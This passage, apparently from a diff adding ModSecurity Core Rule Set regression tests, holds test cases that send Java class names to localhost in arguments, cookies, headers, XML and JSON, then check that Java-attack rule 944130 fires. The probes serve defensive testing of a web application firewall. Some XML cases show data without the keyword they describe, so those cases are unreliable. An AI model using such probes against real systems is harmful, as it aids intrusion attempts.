Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-192 + desc: "XML attribute value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 
+ Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-193 + desc: "XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-194 + desc: "Nested XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-195 + desc: "Content-Type text/plain includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: 
"test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-196 + desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-197 + desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-198 + desc: "Argument test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-199 + desc: "Argument name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-200 + desc: "Cookie test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-201 + desc: "Cookie name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-202 + desc: 
"Request header test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-203 + desc: "XML attribute value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-204 + desc: "XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-205 + desc: "Nested XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-206 + desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-207 + desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-208 + desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-209 + desc: "Argument test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-210 + desc: "Argument name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-211 + desc: "Cookie test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-212 + desc: "Cookie name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-213 + desc: "Request header test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-214 + desc: "XML attribute value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-215 + desc: "XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-216 + desc: "Nested XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-217 + desc: "Content-Type text/plain includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-218 + desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-219 + desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-220 + desc: "Argument test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-221 + desc: "Argument name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-222 + desc: "Cookie test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-223 + desc: "Cookie name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + 
log_contains: "id \"944130\"" + - test_title: 944130-224 + desc: "Request header test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-225 + desc: "XML attribute value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-226 + desc: "XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-227 + desc: "Nested XML element value includes keyword java.io.PrintStream" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-228 + desc: "Content-Type text/plain includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-229 + desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-230 + desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity 
CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-231 + desc: "Argument test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-232 + desc: "Argument name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-233 + desc: "Cookie test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-234 + desc: "Cookie name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-235 + desc: "Request header test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-236 + desc: "XML attribute value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
